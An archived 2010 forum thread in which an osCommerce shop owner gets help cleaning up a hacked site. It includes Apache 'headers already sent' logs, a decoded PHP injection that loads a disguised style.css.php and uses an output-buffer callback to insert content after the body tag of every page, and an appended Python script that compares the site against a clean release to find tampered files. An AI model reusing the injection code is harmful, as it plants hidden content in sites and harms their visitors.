twincactus Posted May 5, 2010

My site renders fine in Firefox, but in Internet Explorer it looks like the style sheet is not being applied. You can see for yourself at www.tbirdammo.com.

I also have a problem where some pages turn up blank. The site was working fine and then some time later I started getting the blank pages. Now, I have the blank pages as well as the garbled IE problem.

Below is an excerpt from my Apache log:

[Tue May 04 16:44:53 2010] [error] [client 192.168.2.7] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/sessions.php on line 103, referer: http://tbirdammo.com/catalog/admin/index.php
[Tue May 04 16:44:53 2010] [error] [client 192.168.2.7] PHP Warning: Cannot modify header information - headers already sent by (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/general.php on line 23, referer: http://tbirdammo.com/catalog/admin/index.php
[Tue May 04 16:48:04 2010] [error] [client 192.168.2.7] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/sessions.php on line 103, referer: http://tbirdammo.com/catalog/admin/login.php
[Tue May 04 16:48:04 2010] [error] [client 192.168.2.7] PHP Warning: Cannot modify header information - headers already sent by (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/general.php on line 23, referer: http://tbirdammo.com/catalog/admin/login.php
[Tue May 04 16:48:11 2010] [error] [client 192.168.2.7] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/sessions.php on line 103, referer: http://tbirdammo.com/catalog/admin/login.php
[Tue May 04 16:49:06 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:49:06 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:49:51 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:49:51 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:53:24 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:53:24 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:53:33 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html
[Tue May 04 16:53:33 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/loca

Can anyone give me some direction as to where to start? I have many items I don't want to lose, otherwise I would just reload the whole thing.

Thanks,
-Tim

germ Posted May 5, 2010

From what I can see you've been hacked. :'(

Read this

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -

"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >

MrPhil Posted May 5, 2010

The error messages tell you that your application_top.php file is sending something to the browser on or near line 1. It shouldn't send anything. Check for code added to the top of your application_top.php file. Did someone edit this recently? Maybe they left a stray blank before the opening <?php.

Did you add <?xml version="1.0" encoding="UTF-8"?> ? I think that IE is known to get ill trying to handle an xml line like that. Try removing the line and see if it makes any difference. I ran the page through the W3C validator, and there were no serious problems (just missing alt attributes on images).

If you still have "blank screen" problems after clearing up the IE problem, read http://www.catskilltech.com/freeSW/SMF/faqs > "Blank page/WSOD" and see if you can find out where the error is occurring.

Also, file names with blanks in them are always a bad idea. Consider renaming with underscores (and Inc. to just Inc). That might also be giving IE fits. By the way, which version of IE are you trying this on?

germ Posted May 5, 2010

The hack code decodes to this:

    // Guard so the injected block runs only once per request
    if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
        $GLOBALS['sh_no']=1;
        // Second-stage file planted among the button images; it is expected to define gml()
        if(file_exists('/usr/local/www/data/catalog/admin/includes/languages/english/images/buttons/style.css.php')){
            include_once('/usr/local/www/data/catalog/admin/includes/languages/english/images/buttons/style.css.php');
            if(function_exists('gml')&&!function_exists('dgobh')){
                if(!function_exists('gzdecode')){
                    // Fallback gzdecode(): skip the gzip header (flag bits 4, 8, 16, 2), then inflate
                    function gzdecode($R20FD65E9C7406034FADC682F06732868){
                        $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
                        $R60169CD1C47B7A7A85AB44F884635E41=10;
                        $R0D54236DA20594EC13FC81B209733931=0;
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){
                            $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                            $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];
                            $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;
                        }
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){
                            $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                        }
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){
                            $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                        }
                        if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){
                            $R60169CD1C47B7A7A85AB44F884635E41+=2;
                        }
                        $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
                        // If inflating fails, the input is passed through unchanged
                        if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){
                            $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
                        }
                        return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                    }
                }
                // Output-buffer callback: inserts whatever gml() returns right after <body>, or at the top of the page
                function dgobh($RDA3E61414E50AEE968132F03D265E0CF){
                    Header('Content-Encoding: none');
                    $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
                    if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){
                        return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                    }
                    else{
                        return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
                    }
                }
                // Every page rendered after this point passes through dgobh()
                ob_start('dgobh');
            }
        }
    }

I posted it because it gives you a location of one of the hack files:

/catalog/admin/includes/languages/english/images/buttons/style.css.php

twincactus Posted May 5, 2010

Looks like the hack. Is it possible to just replace all the php files with new ones without doing a complete reinstall? My backup is also infected. I have cleaned the source files out but all the files still have the junk above the other code that needs to be cleaned. I would like to replace them with a clean copy from a clean download of 2.2rca. Of course I believe there will be some configuration files I would have to manually clean but cleaning those would be small compared to cleaning all of the php files. Which files hold the configs I need to save?

Sorry guys, but I have not had much experience yet with this php product.

Thanks a bunch for the help!
-Tim

twincactus Posted May 5, 2010

> I posted it because it gives you a location of one of the hack files:
> /catalog/admin/includes/languages/english/images/buttons/style.css.php

Thanks, I got this one and several others in that folder. Are there more?

-Tim
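
An added example, not part of the original thread and not osCommerce code: the posts above describe junk sitting above the original code in the PHP files and ask whether more planted files exist, and comparing the live tree against a clean download of the same release answers both without changing anything on disk. `compare_trees` is a hypothetical helper, and the directory layout and file contents in `demo()` are constructed samples.

```python
import tempfile
from pathlib import Path

SAMPLE_JUNK = b"<?php /* constructed stand-in for the injected line */ ?>"

def _read(path):
    # Normalise line endings so an ASCII-mode FTP upload is not reported as a change.
    return path.read_bytes().replace(b"\r\n", b"\n")

def compare_trees(installed, clean):
    """Classify each .php file under `installed` against a clean copy of the same release."""
    report = {"prepended": [], "extra": [], "modified": []}
    for path in sorted(p for p in Path(installed).rglob("*.php") if p.is_file()):
        rel = path.relative_to(installed).as_posix()
        ref = Path(clean, rel)
        if not ref.is_file():
            report["extra"].append(rel)        # absent from the release: add-on or planted file
            continue
        data, good = _read(path), _read(ref)
        if data == good:
            continue
        if good and data.endswith(good):
            # Original code is intact, with foreign bytes added above it.
            report["prepended"].append((rel, len(data) - len(good)))
        else:
            report["modified"].append(rel)     # config or customisation: review by hand
    return report

def demo():
    """Build two small constructed trees in a temp directory and compare them."""
    top = b"<?php\n// application_top (constructed sample)\n"
    trees = {
        "clean": {"includes/application_top.php": top,
                  "includes/configure.php": b"<?php\ndefine('DB_SERVER', '');\n"},
        "live": {"includes/application_top.php": SAMPLE_JUNK + top,
                 "includes/configure.php": b"<?php\ndefine('DB_SERVER', 'localhost');\n",
                 "includes/languages/english/images/buttons/style.css.php": b"<?php\n"},
    }
    with tempfile.TemporaryDirectory() as tmp:
        for tree, files in trees.items():
            for rel, body in files.items():
                target = Path(tmp, tree, rel)
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(body)
        return compare_trees(Path(tmp, "live"), Path(tmp, "clean"))

if __name__ == "__main__":
    print(demo())
```

Files reported as "prepended" match the clean release apart from the bytes added above it, "extra" files need a decision on whether they are a known add-on, and "modified" files are where site configuration is likely to live.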
This topic is now archived and is closed to further replies.